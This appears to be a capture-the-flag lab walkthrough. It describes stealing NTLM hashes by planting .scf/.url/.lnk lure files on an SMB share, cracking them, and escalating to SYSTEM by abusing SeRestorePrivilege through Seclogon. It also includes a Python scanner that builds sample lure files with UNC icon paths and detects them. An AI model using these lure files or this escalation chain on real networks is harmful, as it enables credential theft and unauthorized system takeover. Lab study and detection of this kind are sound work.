Proving Grounds "VAULT" - Walkthrough

This blog post walks through planting malicious files on an SMB share in order to collect user hashes, and then gaining root access by abusing SeRestorePrivilege.


Network Enumeration:

  • The initial network scan reveals the list of open ports. From those ports we learn that Active Directory services are running on the target machine.

Foothold:

  • We can see that the SMB service is active on port 445.
  • Let's list the available shares on the target and count the SMB shares.

  • Let's move to the "DocumentShare" share and look for anything useful.

  • Not much information, but we can put files into, and get files from, the share.

Stealing hashes:

  • We are going to plant malicious files on the SMB share to steal hashes, with the help of "hashgrab" and "Responder".
  • First, create the malicious files using hashgrab.py.

  • Start Responder and wait for the malicious files to be picked up.

  • Upload "@rce.scf", "@rce.url" and "rce.lnk" to the share.

  • Once the files are uploaded, they are executed automatically and Responder captures the user's hash.

  • Excellent! We got the hash.
  • Save the hash and crack it using hashcat.

  • Before that, we need to check which algorithm the hash belongs to and specify the hashcat mode accordingly.

  • Great! We cracked it.
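A defender-side check for the kind of lure files uploaded in this section (an added example, not part of the walkthrough): it scans a mounted share for .scf/.url/.lnk files whose icon or path fields point at a UNC host, the property that makes a browsing user's machine authenticate to the host named in the file. The sample files, the 192.0.2.10 address and the temp-dir "share" are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Constructed fixtures (not files from the lab): an .scf and a .url whose IconFile is a
# UNC path. Explorer resolves such icon paths as soon as the folder is listed, which is
# what makes the browsing user's machine authenticate to the host named in the path.
SAMPLE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
SAMPLE_URL = "[InternetShortcut]\r\nURL=https://example.invalid\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
SAMPLE_LNK = b"L\x00\x00\x00" + "\\\\192.0.2.10\\share\\x.ico".encode("utf-16-le")  # minimal stand-in

UNC_RE = re.compile(r"\\\\[^\\\s]+\\\S+")           # \\host\share\...
ICON_KEYS = {"iconfile", "url", "workingdirectory"}  # .scf/.url keys resolved without a click
LURE_EXTS = {".scf", ".url", ".lnk"}

def scan_file(path: Path) -> list[str]:
    """Report UNC references in one .scf/.url/.lnk file; an empty list means nothing found."""
    ext = path.suffix.lower()
    if ext not in LURE_EXTS:
        return []
    data = path.read_bytes()
    hits: list[str] = []
    if ext == ".lnk":
        # .lnk is binary; embedded strings are UTF-16LE or ANSI, so try both decodings.
        for text in (data.decode("utf-16-le", "ignore"), data.decode("latin-1")):
            hits += [m.group(0) for m in UNC_RE.finditer(text)]
    else:
        for line in data.decode("utf-8", "ignore").splitlines():
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() in ICON_KEYS and UNC_RE.match(value.strip()):
                hits.append(f"{key.strip()}={value.strip()}")
    # Names starting with '@' sort to the top of a listing, so they are rendered first; flag it.
    tag = " (leading '@')" if path.name.startswith("@") else ""
    return [f"{path.name}{tag}: {h}" for h in dict.fromkeys(hits)]

def scan_share(root: Path) -> list[str]:
    """Walk a mounted share and return every finding, sorted for stable output."""
    return sorted(f for p in root.rglob("*") if p.is_file() for f in scan_file(p))

def demo() -> list[str]:
    """Build the constructed share in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "@rce.scf").write_text(SAMPLE_SCF)
        (root / "@rce.url").write_text(SAMPLE_URL)
        (root / "rce.lnk").write_bytes(SAMPLE_LNK)
        (root / "notes.txt").write_text("quarterly report, nothing to see here\r\n")
        return scan_share(root)
```

Point `scan_share` at a real mount point (or run it from a scheduled task on the file server) to get the same findings for a live share; `notes.txt` in the demo shows that ordinary files produce no output.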

User Privilege:

  • We now have both the username and password for the target machine, so we can gain user-level access using "evil-winrm".

Privilege Escalation:

  • Now that we have a shell as the service account, the first thing to do is run whoami /priv to check the account's privileges.

  • We can see that SeRestorePrivilege is enabled.
  • Going to the GitHub link in the comments, I found the following information on how to abuse this privilege.
  • Using this information, we can try to list all services that must be started manually in order to find one we can modify, but since we are not an admin user we will probably find that we lack the permissions to do so.
  • Fortunately, a small number of services are known to support manual start and are startable by all users. We are particularly interested in the Seclogon service.

  • From this, we learn that all users have permission to start the service manually.
  • RP = Start Service, AU = All Users.
  • To abuse the Seclogon service with this privilege, we will use a binary called SeRestoreAbuse.exe.
  • https://github.com/xct/SeRestoreAbuse - We need to compile the C++ code and upload the binary to the target shell.

Exploitation:

  • Getting a SYSTEM shell with SeRestoreAbuse.exe and Netcat.
  • Before running the exploit, start the listener.

  • Great! We got root.

Note: For educational purposes only. Happy Hacking!!!
